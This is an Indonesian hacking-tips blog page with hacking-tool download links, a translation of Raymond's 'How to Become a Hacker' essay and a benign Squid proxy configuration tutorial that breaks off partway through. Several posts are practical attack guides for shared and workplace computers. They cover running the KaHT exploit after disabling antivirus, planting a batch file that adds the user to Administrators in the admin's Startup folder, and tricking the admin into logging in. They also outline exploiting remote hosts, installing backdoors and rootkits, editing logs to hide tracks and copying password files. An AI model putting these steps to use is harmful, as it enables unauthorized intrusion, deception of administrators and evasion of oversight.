- Download Paket Special (Brontok Remover, CGI IRC 0.5.9 (chat irc via web), kumpulan konsultasi dr iwan, Kumpulan WIKI Sejarah Internet Indonesia, Script utk Shell)
- Download MultiKiller2 (Antivirus buatan PusHm0v Disk 1|
Download MultiKiller2 (AntiVirus buatan PusHm0v Disk 2
- Download ResHack
- Download samarindahack.zip
- Download malanghack.zip
- Download kumpulbocah.rar
borneofree 2005 Report for all
Masuk ke borneofree Information Report 2005 maka klik disini
Untuk mendownload ratusan tools lainnya maka klik disini
borneoFamily Code 2007 Beta 15 Support
Untuk mendapatkan materi lama lebih banyak maka klik disini.
Jika anda download dan muncul pesan seperti tampilan ini maka tunggulah beberapa jam lagi atau download pada malam / pagi hari karena sebagian materi berada di geocities.com yang merupakan sisa-sisa era borneo Family Code 2005.
Sumber :
- Berbagai sumber seperti dari url aslinya, forum dan milis yogyafree, web borneofree classic dsb.
Mengapa Tulisan Ini Dibuat?
Sebagai penyunting Jargon File dan penulis beberapa tulisan serupa lain yang telah dikenal luas, saya sering menerima email permintaan dari newbie jaringan yang antusias, bunyinya (kurang lebih) “bagaimana cara menjadi hacker jagoan?”. Anehnya, tidak ada FAQ atau dokumen web lain yang membahas pertanyaan penting ini, jadi inilah tulisan saya.
Jika Anda membaca snapshot dokumen ini secara offline, kunjungi versi terakhirnya di http://www.tuxedo.org/~esr/faqs/hacker-howto.html.
Catatan: ada daftar FAQ di akhir tulisan. Bacalah FAQ ini — dua kali — sebelum mengirim email pertanyaan pada saya seputar dokumen ini.
Terjemahan berbagai bahasa dari tulisan ini tersedia: : Bulgaria, Cina (Simplified), Cina (Tradisional), Denmark, Belanda, Prancis, Finlandia, Jerman, Hungaria, Italia, Indonesia, Jepang, Korea, Portugis, Rusia, Spanyol, dan Swedia. Perhatikan bahwa karena dokumen ini sesekali berubah, terjemahan-terjemahan tersebut mungkin sedikit banyak kadaluarsa.
2. Apa Hacker Itu?
Jargon File memuat beberapa definisi untuk kata ‘hacker’, hampir semuanya berkaitan dengan kemahiran teknis serta kegemaran menyelesaikan masalah dan mengatasi keterbatasan. Namun jika ingin menjadi seorang hacker, hanya ada dua definisi yang relevan.
Ada sebuah komunitas, budaya, terdiri dari para programer mahir dan ahli jaringan, yang sejarahnya bermula dari dekade minikomputer pertama yang memiliki time-sharing dan zaman eksperimen awal ARPAnet. Dari anggota budaya inilah muncul istilah ‘hacker’. Hackerlah yang membangun internet. Hackerlah yang membuat sistem operasi Unix menjadi seperti sekarang. Hackerlah yang mengoperasikan Usenet. Hacker yang membuat World Wide Web berjalan. Jika Anda bagian dari budaya ini, jika Anda telah menyumbangkan sesuatu untuk budaya ini, dan rekan lain di dalamnya mengenali Anda sebagai seorang hacker, maka seorang hackerlah Anda.
Cara pikir hacker tidak terbatas pada budaya hacker software. Ada orang yang menerapkan sikap hacker pada banyak bidang lain, elektronik atau musik — bahkan, cara pikir hacker ada di tingkat tertinggi setiap bidang ilmu dan seni. Hacker software mengakui semangat serupa ini dan kadang menyebut orang-orang tersebut “hacker” pula — sebagian juga berpendapat bahwa sifat seorang hacker tidak bergantung pada wadah tempatnya bekerja. Tapi, untuk selanjutnya, kita akan memusatkan perhatian pada software hacker, keahlian dan sikap mereka, serta tradisi budaya bersama yang melahirkan istilah ‘hacker’.
Terdapat pula sekelompok lain yang menyebut-nyebut diri hacker, padahal bukan. Mereka-mereka ini (terutama terdiri dari remaja pria) mendapat kepuasan lewat membobol komputer dan mengakali telepon (phreaking). Hacker sejati menyebut orang-orang ini ‘cracker’ dan tidak suka bergaul dengan mereka. Hacker sejati memandang cracker sebagai orang malas, tidak bertanggung jawab, dan tidak terlalu cerdas. Hacker sejati tidak setuju jika dikatakan bahwa dengan menerobos keamanan seseorang telah menjadi hacker, sama seperti jika dikatakan bahwa mengontakkan mobil membuat seseorang langsung menjadi ahli mesin. Sayangnya, wartawan dan penulis telah salah kaprah dan menggunakan kata ‘hacker’ untuk melukiskan cracker; sesuatu yang selalu membuat kesal para hacker sejati.
Perbedaan mendasar antara hacker dan cracker: hacker membangun, cracker membongkar.
Jika Anda ingin menjadi hacker, lanjutkan membaca. Jika ingin menjadi cracker, kunjungi newsgroup alt.2600 dan bersiaplah menghabiskan lima sampai sepuluh tahun di balik jeruji setelah mengetahui bahwa Anda ternyata tidak sepandai yang Anda kira. Hanya itu yang perlu dikatakan tentang cracker.
3. Sikap Hacker
Pekerjaan hacker menyelesaikan masalah dan membangun sesuatu, dan hacker percaya pada kebebasan dan kerjasama sukarela. Agar dapat diterima sebagai seorang hacker, Anda harus berbuat seolah-olah Anda memiliki sikap ini. Dan agar dapat berbuat demikian, sikap ini harus benar-benar diyakini.
Tapi kalau Anda berniat menumbuhkan sikap ini hanya agar dapat diterima di lingkungan hacker, maka Anda belum menangkap maknanya. Menjadi orang yang meyakini sikap hacker penting bagi Anda sendiri — agar bisa terus belajar dan termotivasi. Sama seperti semua seni kreatif lain, cara paling efektif untuk menjadi seorang ahli adalah dengan meniru cara berpikir ahli-ahli lainnya — bukan hanya secara intelektual tapi juga emosional.
Seperti diungkapkan oleh sebuah sajak Zen modern di bawah:
Untuk mengikuti jalan:
pandanglah sang ahli,
ikuti sang ahli,
berjalan bersama sang ahli,
kenali sang ahili,
jadilah sang ahli.
Jadi, jika ingin menjadi hacker, ulangi pernyataan di bawah ini sampai benar-benar Anda yakini:
3.1 Dunia penuh dengan persoalan-persoalan menarik yang menanti untuk dipecahkan.
Menjadi seorang hacker sebetulnya menyenangkan, tapi ‘menyenangkan’ yang menuntut usaha. Usaha ini membutuhkan motivasi. Atlet yang sukses memperoleh motivasi dari kepuasan fisik saat tubuh mereka beraksi, saat mendorong diri melampaui batasan fisik. Demikian juga, untuk menjadi seorang hacker Anda harus merasa tertarik memecahkan persoalan, mengasah keahlian, dan melatih kecerdasan.
Jika Anda merasa bukan seperti ini secara naluri, Anda harus berusaha menjadi demikian jika ingin berhasil menjadi hacker. Jika tidak, energi hacking Anda akan melemah karena perhatian teralihkan oleh seks, uang, dan kedudukan.
(Anda pun harus mengembangkan keyakinan pada kapasitas belajar diri — keyakinan bahwa meskipun yang Anda ketahui belum cukup untuk memecahkan suatu persoalan, jika satu potongan saja dari persoalan Anda usaha pecahkan, maka itu sudah cukup memberi pelajaran kepada Anda untuk menyelesaikan potongan berikutnya — dan berikutnya, hingga semua potongan terselesaikan.)
3.2 Tidak seharusnya masalah yang sama dipecahkan dua kali.
Otak yang kreatif merupakan sumber daya yang berharga dan terbatas. Tidak seharusnya sumber daya ini diboroskan hanya untuk memikirkan kembali suatu persoalan dari dasar; padahal ada begitu banyak masalah menarik baru lain di dunia ini yang menanti.
Agar dapat bertingkah laku seperti hacker, Anda harus percaya bahwa waktu berpikir hacker lain itu berharga — sebegitu berharganya hingga merupakan suatu kewajiban moral bagi Anda untuk membagikan informasi, menyelesaikan masalah lalu memberi jawabannya pada hacker lain supaya mereka menyelesaikan masalah baru dan tidak selamanya berkutat pada masalah-masalah lama.
(Tidak harus berkeyakinan bahwa semua produk kreatif Anda harus direlakan bagi orang lain, meski hacker yang demikianlah yang paling dihormati hacker lain. Menurut nilai-nilai hacker, jual saja sebagian asal cukup untuk tetap makan, tetap dapat membayar sewa rumah, dan tetap dapat memakai komputer. Tidak melanggar nilai hacker jika Anda memanfaatkan ilmu Anda untuk membiayai keluarga atau bahkan memperkaya diri, asalkan sambil melakukannya tetap setia pada disiplin ilmu dan sesama hacker lain.)
3.3 Kebosanan dan pekerjaan membosankan itu jahat.
Hacker (dan manusia kreatif pada umumnya) tidak seharusnya dibosankan dengan pekerjaan bodoh yang berulang-ulang, karena ini berarti mereka tidak melakukan pekerjaan yang hanya bisa dilakukan oleh mereka — menyelesaikan persoalan-persoalan baru. Pemborosan sumber daya ini merugikan semua pihak. Karena itu kebosanan dan pekerjaan membosankan bukan saja tidak menyenangkan tapi juga jahat.
Agar dapat bertingkah laku seperti hacker, Anda harus meyakini hal ini sehingga Anda berkeinginan untuk mengotomasi sebanyak mungkin bagian yang membosankan, bukan saja bagi diri sendiri tapi juga orang lain (terutama sesama hacker).
(Ada satu kekecualian yang jelas. Hacker kadang melakukan pekerjaan yang di mata orang lain tampaknya berulang-ulang atau membosankan; ini untuk latihan menjernihkan pikiran, atau dalam rangka memperoleh keahlian atau pengalaman yang tak bisa tidak harus diperoleh dengan cara demikian. Tentu saja hal ini dilakukan atas dasar kehendaknya sendiri — setiap orang yang mampu berpikir tidak seharusnya dipaksa menjadi bosan.)
3.4 Kebebasan itu baik.
Secara alamiah hacker itu anti-otoriter. Siapa pun yang dapat memerintah Anda akan dapat menghentikan Anda untuk menyelesaikan persoalan yang menarik — dan, sesuai pikiran otak para otoriter, pada umumnya akan membuat alasan yang benar-benar bodoh untuk itu. Jadi sikap otoriter harus dilawan di mana pun Anda berada, agar nantinya tidak menekan Anda dan hacker-hacker lain.
(Tidak untuk disamakan dengan melawan setiap bentuk kekuasaan. Anak-anak tetap harus dibimbing, para kriminal ditahan. Seorang hacker mungkin akan tunduk pada bentuk-bentuk kekuasaan tertentu agar dapat memperoleh sesuatu yang lebih dari waktu yang dibutuhkan untuk mengikuti peraturan. Ini lebih merupakan tawar-menawar yang terbatas dan dilakukan secara sadar; jenis tunduk diri yang diinginkan oleh orang-orang otoriter tentu saja tidak bisa diterima.)
Para otoriter hidup di atas sensor dan kerahasiaan. Mereka tidak percaya pada kerjasama dan berbagi informasi — satu-satunya jenis ‘kerja sama’ yang disukai adalah yang dapat mereka kendalikan. Jadi untuk berlaku seperti seorang hacker, Anda perlu mengembangkan rasa benci pada penyensoran, kerahasiaan, dan penggunaan kekerasan atau penipuan untuk memaksakan kehendak pada orang dewasa. Dan Anda harus bersedia bertindak atas dasar keyakinan ini.
3.5 Sikap saja tak ada artinya tanpa keahlian.
Untuk menjadi hacker, Anda perlu mengembangkan sebagian dari sikap-sikap yang telah disebutkan. Tapi memiliki sikap saja belum membuat seseorang menjadi hacker, atau atlet juara atau bintang rock. Untuk menjadi hacker dibutuhkan kecerdasan, latihan, dedikasi, dan kerja keras.
Jadi, Anda perlu belajar untuk tidak mempercayai sikap saja dan menghormati setiap bentuk kemampuan. Hacker tidak bersedia menghabiskan waktu dengan orang-orang yang hanya bersikap seperti hacker, tapi hacker memuja keahlian — terutama keahlian dalam hacking, tapi juga keahlian di bidang apapun. Yang terlebih bagus lagi yaitu keahlian dalam bidang yang sulit dan hanya dapat dikuasai oleh sedikit orang, dan yang terbaik adalah keahlian dalam bidang yang sulit dan melibatkan ketajaman mental, keahlian, serta konsentrasi.
Bila Anda memuja keahlian, Anda akan merasa senang dalam meningkatkan kemampuan diri — kerja keras dan dedikasi akan menjadi semacam permainan yang mengasyikkan ketimbang pekerjaan membosankan. Dan hal ini penting dalam proses menjadi hacker.
4. Kemampuan Hacking Dasar
Sikap hacker penting, tapi terlebih penting lagi keahlian. Sikap bukan pengganti keahlian, dan ada seperangkat keahlian menggunakan perangkat tool yang perlu Anda kuasai sebelum orang bahkan bisa berpikir memanggil Anda hacker.
Perangkat tool ini perlahan-lahan memang berubah seiring teknologi yang menciptakan keahlian baru dan membuat keahlian lama tidak berguna. Misalnya, dulu keahlian pemrograman bahasa mesin termasuk, dan kemampuan HTML belum dan hanya baru-baru ini saja. Yang jelas saat ini yang termasuk adalah:
4.1 Pelajari pemrograman.
Ini tentunya merupakan keahlian hacking yang fundamental. Jika Anda belum pernah belajar bahasa pemrograman mana pun, saya sarankan mulai dengan Python. Disainnya bersih, terdokumentasi dengan baik, dan cukup mudah bagi pemula. Meski menjadi bahasa pertama, bukan berarti Python hanya mainan; Python amat ampuh dan fleksibel dan cocok untuk proyek-proyek besar. Saya menulis evaluasi terhadap Python yang lebih mendetil. Tutorial Python bisa dilihat di situs web Python (terjemahan Indonesia).
Java juga bahasa yang baik untuk belajar pemrograman. Lebih sulit dari Python, tapi menghasilkan kode yang lebih cepat dari Python. Menurut saya Java amat bagus sebagai bahasa kedua.
Perlu diingat bahwa dengan satu dua bahasa pemrograman saja Anda tidak akan mencapai tingkat keahlian seorang hacker, atau bahkan seorang programer — Anda perlu belajar cara memandang pemrograman secara umum, tidak bergantung pada satu bahasa mana pun. Untuk menjadi hacker sejati, Anda perlu mencapai tahap di mana Anda dapat mempelajari bahasa baru dalam beberapa hari, dengan menghubungkan apa yang ada di manual dengan apa yang telah Anda ketahui. Hal ini berarti, Anda perlu mempelajari beberapa bahasa yang jauh berbeda satu dengan yang lainnya.
Jika ingin serius dalam pemrograman, pada akhirnya Anda harus belajar C, bahasa inti sistem operasi Unix. C++ terkait erat dengan C; jika tahu yang satu, belajar yang lain tidak akan susah. Namun keduanya bukan bahasa yang cocok untuk dipelajari pertama kali.
Bahasa lain yang juga penting untuk hacker antara lain Perl dan LISP. Perl patut dipelajari untuk kebutuhan praktis; Perl dipakai secara amat meluas untuk halaman web aktif dan untuk administrasi sistem, jadi meskipun nantinya Anda tidak akan membuat program dalam Perl, Anda sebaiknya belajar cara membaca Perl. LISP patut dipelajari karena akan memberikan pengalaman ‘membuka pikiran’ jika Anda telah menangkapnya; dengan mempelajari LISP, Anda akan menjadi seorang programer yang lebih baik, meskipun dalam kenyataan Anda akan jarang memakainya.
Paling baik sebetulnya mempelajari semuanya (Python, Java, C/C++, Perl, dan LISP). Selain merupakan bahasa-bahasa terpenting dalam hacking, masing-masing mewakili cara pendekatan pemrograman yang berbeda, dan tiap bahasa akan memberi Anda pelajaran-pelajaran berharga.
Tentu saja, di sini tidak mungkin saya memberi petunjuk lengkap cara memrogram — pemrograman merupakan keahlian yang kompleks. Tapi, satu petunjuk yang saya berikan: buku dan kursus saja tidak akan membuat Anda menjadi seorang programer (banyak, mungkin hampir semua hacker terbaik itu belajar mandiri). Anda akan menjadi programer dengan (a) membaca kode dan (b) menulis kode.
Belajar membuat program adalah seperti belajar menulis dalam bahasa alamiah. Cara terbaik untuk melakukannya dengan membaca tulisan yang dibuat oleh para ahlinya, membuat tulisan sendiri sedikit, membaca lebih banyak lagi, menulis lebih banyak, dan mengulanginya sampai di tulisan Anda mulai terbentuk semacam kekuatan dan kemahiran penggunaan kata seperti di tulisan-tulisan yang semula Anda teladani
Mo Cari Akses Admin
Terkadang dalam suatu warnet atau Lab atau bahkan kost. yang menggunakan WIndows XP, biasanya pengguna diberikan akses guest atau limited account. Untuk ngeburn CD atau klo mo nginstall program kita ngga akan bisa, karena aksesnya bukan admin. Kadang-kadang ngeselin juga klo kayak gitu, jadi ngga bisa ngapa-ngapain, Burn CD ga bisa, jalanin program ga bisa, pokoknya terbatas banget :(…
gue mo ngasih tips gimana caranya dapetin akses admin yang memanfaatkan kelemahan di Windows XP. Mungkin yg master dah pada tau tips ini, tapi kan ngga semuanya master ;p… gue cuma mo bagi-bagi ilmu aja, siapa tau ada gunanya. Tapi penulis ngga bertanggung jawab klo ada yang menggunakan untuk hal-hal yang kurang bertanggung jawab, tutorial ini cuman untuk iseng-iseng aja, he…
Apa aja yang dibutuhin ?
1. Komputer??
2. Hoki, karena cuman WinXP yg blm di Update aja (ato yg masih Vulner yg bisa diakses)
3. Uang, buat jajan n kewarnet (atau klo mau, bisa ngehack bilingnya, bisa ga pake uang kan… tp bisa2 lo ketangkep)
Langkan pertama lo butuh program exloit KaHT yg dibuat oleh Kralor, KaHT tuh bisa ‘NyeCan’ beberapa Host, trus dicari mana yg ‘Vulner’, n jalanin exploit di Host yg Vulner itu. Klo Linknya ga bisa, coba Googling aja, banyak ko, atau klo msh g dpt juga email aja ke gue! klo dah dapet, trus jalanin cmd lewat Run (Start > Run > cmd). Sebelumnya jangan lupa untuk men-disable antivirus, karena kaht dikenali sebagai trojan. Misalkan program kaht ada di drive C, folder kaht, maka pertintahnya sbb:
C:\kaht>kaht 127.0.0.0 127.0.0.1
–> artinya scan Ip dari 127.0.0.0 sampai 127.0.0.1 (127.0.0.1 adalah IP untuk Loopback, artinya kaht melakukan scanning untuk komputer itu sendiri)
Bisa juga untuk Scanning jaringan tertentu misalnya
kaht 192.168.0.0 192.168.0.100
Klo berhasil, lo bakal dapet akses admin..
C:\Windows\system32>
coba check IP nya (ipconfig), apa ini komputer kita ???
TaRaa…. yup, ‘Admin Under Control’ hehe… dapet deh akses admin :D
Klo dah gini lo bisa ngapain aja lewat komputer itu. Mo, ngeBurn CD, mo liat-liat file yg di ‘protect’ admin (siapa tau aja ada file2 yg menarik), mo buat user dgn akses admin, atau buat Backdoor biar klo Login usernya punya akses admin…. Atau lo bisa ngisengin temen lo yang satu jaringan (LAN), bisa juga curangin waktu maen game di jaringan… hehe.. kan seru tuh!!
Hack Buat Pemula
Artikel ini ditujukan bagi pemula, dan disusun oleh pemula. Ditulis untuk pengetahuan semata. Untuk temen2 yg udah ahli, sok aja dilewat, tapi dibaca juga gpp….
Apa sebenarnya hacking itu? klo menurut pengertian gue, hacking adalah ngoprek. Yup, hacking adalah ngoprek, mempelajari sesuatu dengan keingintahuan (curiosity) yg tinggi, ngutak atik sesuatu, ‘ngudek-ngudek’ sampai ke ‘jeroannya’. Sesuatunya apa dong? ya terserah… bisa komputer, mobil, motor, mesin. Tapi masalahnya ada ngga ya hacker mobil, hacker motor, atau hacker pesawat terbang?? hehe… Walaupun saat ini hacking identik dengan ‘bobol-membobol’, tapi gue kurang setuju klo cuman bobol server orang doang!. Ada yang bilang ‘Hacking is Art’, trus dimana letak seninya dong? Mau tau pengertian hacking sebenarnya, coba baca artikel sebelumnya (How to Become A Hacker). Di situ dijelasin bahwa hacker berkaitan dengan kemahiran teknis serta kegemaran menyelesaikan masalah dan mengatasi keterbatasan. Contoh hacker pada saat ini yang sering-sering disebut adalah Linus Torvald (tau ngga? itu lho yang menciptakan Linux). Apa dia tukang bobol? belum tentu kan….
Pada artikel ini, gue pengen membagi pengalaman mengenai Hacking, walaupun sampai saat ini gue belum pernah nge-Hack ke server orang. Salah satu cara untuk mencoba simulasi Hack yaitu H3cky0uRs3lf! Buat komputer kita sebagai server (sekaligus belajar konfigurasi server) trus install program yg dibutuhkan. Misalnya klo mo Web Hacking, coba install Apache atau IIS. Atau kita sesuaikan dengan exploit yang udah kita dapet. Tapi lebih baik install Linux atau FreeBSD dulu di komputer pribadi, trus konfigurasi sebagai server, lalu simulasi Hack, setelah itu baru Hack Betulan… Apalagi klo di kost ada jaringan.
Pro dan Kontra Hacking
Pro Kontra
Etika Hacking Semua informasi adalah free Jika semua informasi adalah free, maka tidak ada ladi privacy
Aspek Security Intrusion adalah ilustrasi kelemahan sistem Tidak perlu menjadi pencuri untuk menunjukkan pintu yang tidak terkunci
Idle Machines Hacking hanya pada idle machines idle machines milik siapa ?
science education hanya membobol tapi tidak merusak “hacker wannabe” berpotensi sangat besar untuk merusak
Okeh, sekarang waktunya melakukan aksi…
1. Fase Persiapan
~ Mengumpulkan informasi sebanyak-banyaknya
- Secara Aktif : - portscanning
- network mapping
- OS Detection
- application fingerprinting
Semua itu bisa dilakukan menggunakan toolz tambahan seperti nmap atau netcat
- Secara Pasif : - mailing-list (jasakom, newbie_hacker, hackelink, dsb)
- via internet registries (informasi domain, IP Addres)
- Website yang menjadi terget
2. Fase Eksekusi
~ Setelah mendapatkan informasi, biasanya akan didapatkan informasi mengenai OS yg digunakan, serta port yang terbuka dengan daemon yg sedang berjalan. Selanjutnya mencari informasi mengenai vulnerability holes (celah kelemahan suatu program) dan dimanfaatkan menggunakan exploit (packetstromsecurity.org, milis bugtraq, atau mencari lewat #IRC).
~ Mengekspolitasi Vulnerability Holes
- compile eksploit -> local host -> $gcc -o exploit exploit.c
$./exploit
# hostname (# tanda mendapatkan akses root)
remote host -> $gcc -o exploit exploit.c
$./exploit -t www.terget.com
# (klo beruntung mendapatkan akes root)
~ Brute Force
- Secara berulang melakukan percobaan otentifikasi.
- Menebak username dan password.
- Cracking password file
~ Social Engineering
- Memperdayai user untuk memeberi tahu Username dan password
- Intinya ngibulin user….
3. Fase Setelah Eksekusi
~ Menginstall backdoor, trojans, dan rootkit
~ Menghapus jejak dengan memodifikasi file log agar tidak dicurigai admin
~ Menyalin /etc/passwd atau /etc/shadow/passwd
Nah, intinya seh cara masuk ke server seseorang seperti fase diatas. Mencari informasi, temukan exploit, dan tinggalkan backdoor. Cuma masalahnya hacking bukanlah segampang cara-cara diatas. Itu hanyalah teori, banyak hal yang harus diperhatikan jika ingin mempraketekkan hacking ke server seseorang. Jangan sekali-kali mencoba2 hacking ke server orang tanpa memperhatikan anonimitas (apalagi klo connectnya lewat komputer pribadi tanpa menggunakan proxy). Ntar klo ketahuan bisa repot. Saran gue, cobalah pada mesin localhost dulu (komuter pribadi), klo terhubung ke LAN lebih bagus. Sediakan server yang khusus buat dioprek. Selanjutnya terserah anda………
Referensi :
-Hacking and Defense, Jim Geovedi, negative@magnesium.net
-Network Defense, Jim Geovedi, negative@magnesium.net
Posted by M. Thoyib HM at 7:00 PM 0 comments
Mendapatkan Account “Maha Dewa” (Win2K & WinXP)
Anda sering kesal karena tidak bisa masuk ke control panel ? Tidak bisa install program baru karena system anda diproteksi oleh admin ? Justru kekesalan itulah yang memberikan dorongan kreatifitas untuk mendapatkan ide meningkatkan permission userid yang kita gunakan.
Pada artikel ini ditunjukkan bagaimana trik menjadi administrator hanya dengan beberapa langkah sederhana. Perpaduan teknik hacking, yaitu membuat batch file dan social engineering (kalo diterjemahkan dalam bahasa sehari-hari artinya “NEPU”)
Cek terlebih dahulu permission (group user) anda:
Langkah yang perlu dilakukan adalah sbb:
Start > Run > CMD , gue ketik deh ; net user
Hasilnya:
C:\Documents and Settings\RISKI>net use User accounts for \\UNKNOWN ——————————————————————————- __vmware_user__ Administrator Guest HelpAssistant RISKI SUPPORT_388945a0 The command completed successfully.
Aha! ternyata account gue udah di daftarin di local acount sama admin gue nih, jadi waktu gue login domain di PC ini sudah terdaftar juga di local account, entah PANGKAT apa yang admin kasih ke gue, sebaiknya gue cek dulu deh pake net user, Start > Run > CMD, gue ketik lagi; net user RISKI
C:\Documents and Settings\RISKI>net user riski User name RISKI Full Name Comment User’s comment Country code 000 (System Default) Account active Yes Account expires Never Password last set 6/21/2005 9:12 AM Password expires Never Password changeable 6/21/2005 9:12 AM Password required Yes User may change password Yes Workstations allowed All Logon script User profile Home directory Last logon 8/19/2005 10:10 PM Logon hours allowed All Local Group Memberships *Power User Global Group memberships *None The command completed successfully.
Ternyata bener dugaan gue, si admin cuma ngasih gue PANGKAT Power User, yang udah pasti punya hak yang sangat terbatas dan minim, terutama buat gue lah! ? sampe sampe gue gak bisa nginstal program2 kesayangan gue ? hemm…. Tunggu aja luh admin brengsek dan pelit, tunggu aja tanggal mainnya! He..he..h.e……
Setelah cek & ricek ternyata Win2000 telah di instal sang admin dengan File System FAT32, huh dasar males mungkin dia formatnya pake Disk Manager kali yak! Yang partisi dan formatnya sekaligus dan lebih cepet tapi sayangnya gak bisa ngasih file system NTFS yang sebenarnya encrytpsi datanya jauh lebih bagus dari pada FAT32, kenapa gue bilang begitu? salah satu contohnya adalah dalam FAT32 seluruh user yang login pada OS tersebut dapat mengakses setiap profile yang ada di bawah direktori document and settings termasuk seluruh direktory pada profile sang ADMINISTRATOR ? aha.. lubang kecil yang amat bagus untuk di exploitasi bukan? Bah bagaimna pula diexploitasinya nih?…
Oke sekarang kita akan mencoba membuat account yang kita punya menjadi account Maha Dewa ? yaitu administrator dengan memanfaatkan celah kecil yang ada,
1. Pertama kita buat batch file untuk mendaftarkan local account kita untuk dijadikan account Maha Dewa yaitu ADMINISTRATOR alias sang pengatus semuanya gitu loh!
Kita gunakan command net localgroup, perhatikan batch file di bawah ini
———————————-start——————————
@echo off
net localgroup Administrators RISKI /add
exit
———————————-end—————————–
ketikkan script tersebut di notepad lalu save as dengan nama admin.bat
2. Yang kedua ini adalah bagian yang paling penting yaitu menaruh file ini agar di exekusi oleh sang admin, karena perintah ini dapat berjalan dengan sempurna hanya oleh sang dewa, tenaaanggg!!! Sebentar lagi kita akan mempunya POWER yang sama dengan si doi sang Admin yang PeLiT he..h.e…he…he..
Karena kita di izinkan untuk menjelajah kemana saja pada file system ini, maka sisipkan admin.bat pada direktori startUp administrator pada alamat berikut ;
C:\Documents and Settings\Administrator\Start Menu\Programs\Startup
Nah betul sekali dugaan anak gaul sekalian, jadi program itu akan segera di eksekusi secara otomatis begitu sang admin login dengan accountnya, maka seketika itu account RISKI yang cuma punya pangkat Power User maka pada saat itu juga RISKI sekaligus mempunya 2 pangkat, yaitu Power User dan Adminsitrators he…he…. Ketika kita menjadi sang Maha Dewa, you know what should you do next! ?
FYI, jika kita belum terdaftar pada local account (ketika kita cek dengan net user ternyata tidak ada user name kita waktu login) maka script batch filenya kita rubah sedikit dengan tambahan mendaftarkan username kita kedalam local account, baru setelah itu bisa kita naikkan pangkatnya menjadi Administrators, modifikasinya adalah sebagai berikut:
———————————–start———————————
@echo off
net user user_name_kamu /add
net localgroup Administrator user_name_kamu /add
exit
————————————end———————————
Nah setelah semuanya siap lakukan lah hal yang telah di jelaskan pada langkah kedua, maka kita hanya cuma menunggu sang admin login dengan account adminsitratornya, (waduh kapan nih si doi login dan kemakan perangkap gue?…. bisa botak nih nunggunya!) saran gue sih cuma 1 do it the Social Engineering dwonk!! Masak gitu aja bingung? Pancing si admin supaya dia login di profile adminya, sepengalaman gue sih kalo kita ada kerusakan atau masalah kecil si IT Helpdesk login admin dulu untuk ngecek segala sesuatunya, maklum kalo login di user biasa serba terbatas hi…hi…hi..hi… jadi dari modal pengalam gue mudah mudahan muncul ide ide social engineering yang lebih oke biar si admin kena jebakan kita… dan kalo udah berhasil jangan melakukan hal2 yang destruktif dan merugikan orang lain yang instal AAtolls buat scaning PC si admin wakakakkakak…… atau instal Trojan Client di situ yang nanti servernya di kirim via network atau email ke admin! Duh berdosalah aku kalo gitu yang turut membantu niat jelekmu!
Posted by M. Thoyib HM at 6:59 PM 0 comments
SQUID Proxy Server Tutorial
Introduction/Disclaimer
——————–
This document may be modified, reproduced, and distributed free of charge, as
long as the “INTRODUCTION/DISCLAIMER” notice and the original author’s name are
both included. Also, please go to http://www.freebsd.org/copyright/index.html for
FreeBSD copyright information.
Created Fri Oct 24 00:13:23 MYT 2003 - aka ded1
E-mail: ded1@MyBSD.org.my
WWW: http://www.ded1.net
*Sebarang komen/idea/pertanyaan dialu-alukan.
APAKAH ITU SQUID DAN SERVER PROXY ?
———————————–
Untuk yang belum mengetahui ape benda ni, sila baca serta fahamkan di:
http://www.squid-cache.org/Doc/FAQ/FAQ.html
Benda yang digunakan untuk setup serta menguji proxy server ini:
- 1 FreeBSD 4.7-RELEASE server (IP: 202.188.88.250)
- 1 switch
- 3 workstation (IP: 202.188.77.0/24)
- Kemudahan sambungan ke internet
1. Ambil source code terbaru versi stable squid di: http://www.squid-cache.org/Versions/
2. Contoh: http://www.squid-cache.org/Versions/v2/2.5/squid-2.5.STABLE4.tar.gz
3. Kemudian letak di mana-mana directory contoh di /root/SQUID/
4. tar source code tu:
tar -xzvf squid-2.5.STABLE4.tar.gz
5. lepas tar akan wujud 1 dir baru bernama squid-2.5.STABLE4/
6. cd ke squid-2.5.STABLE4/
7. baca file README dan INSTALL dan fahamkan.
8. Mulakan compile squid dengan option command:
./configure –enable-delay-pools –enable-ipf-transparent
RUJUKAN:
–enable-delay-pools = dengan option ini, sebenarnya adalah untuk menghadkan penggunaan bandwidth.
Ini akan memberikan penggunaan bandwidth sama rata di kalangan pengguna dalam
LAN. Saya tidak mahu ada seorang/sebahagian sahaja pengguna yang menggunakan
semua bandwidth dengan memuat turun video klip/cerita yang bersaiz besar di mana
menyebabkan pengguna lain menderita kesakitan yang amat sangat akibat salahguna
bandwidth oleh individu tertentu.
–enable-ipf-transparent = dengan option ini, adalah untuk enable Transparent Proxy untuk sistem menggunakan
IP Filter network address redirect. Option ini merupakan cara paling baik untuk
memaksa pengguna dalam LAN agar menggunakan proxy setiap masa untuk browser mereka.
Kemudian:
make all
make install
9. Siap compile & install squid.
10. Sekarang kita perlu edit squid.conf, Backup squid.conf yang asal dan gunakan squid.conf saya (jika
anda mahu), semuanya terpulang pada anda, kerana squid.conf asal agak kompleks dan memeningkan.
11. Cipta 1 file bernama squid.conf dan letakkan di /usr/local/squid/etc/
12. Berikut ialah kandungan squid.conf saya :
—————————————————————
# PROXY SERVER ded1
#
http_port 1616
icp_port 0
acl noaccess dstdomain “/usr/local/squid/etc/noaccess.dat”
acl QUERY urlpath_regex cgi-bin \?
acl local dst 202.188.88.250
acl fullspeed dstdomain “/usr/local/squid/etc/fullspeed.dat”
acl nodelay src 202.188.78.1
#
# specifies the network in which to “delay” web access.
#
acl capped src 202.188.85.0/255.255.255.0
no_cache deny QUERY
cache_mem 16 MB
cache_dir ufs /etc/cache 256 16 256
redirect_rewrites_host_header off
dns_nameservers 202.188.0.133
icon_directory /usr/local/squid/share/icons
cache_replacement_policy GDSF
#
# specify the network address and subnet of the local network to which the linux server is connected to.
#
acl localnet src 202.188.77.0/255.255.255.0
#
# specify the BSD server’s IP address.
#
acl localhost src 127.0.0.1/255.255.255.255
acl SSL_ports port 443 8443 563 777
acl Safe_ports port 25 80 110 443 563 777 210 119 70 21 1025-65535
acl CONNECT method CONNECT
acl all src 0.0.0.0/0.0.0.0
http_access deny noaccess
http_access allow localnet
http_access allow localhost
http_access deny !Safe_ports
http_access deny CONNECT !SSL_ports
http_access deny all
cache_mgr ded1@crap.com
cache_effective_user squid
cache_effective_group squid
log_icp_queries off
buffered_logs on
# Delay Pools (Bandwidth Throttling)
delay_pools 3
# Delay Pool number 1 of class 2 for local network NOT throttled for local services.
delay_class 1 2
delay_parameters 1 -1/-1 -1/-1
delay_access 1 allow local fullspeed
# Delay Pool number 2 of class 2 for local network NOT throttled for ACL nodelay.
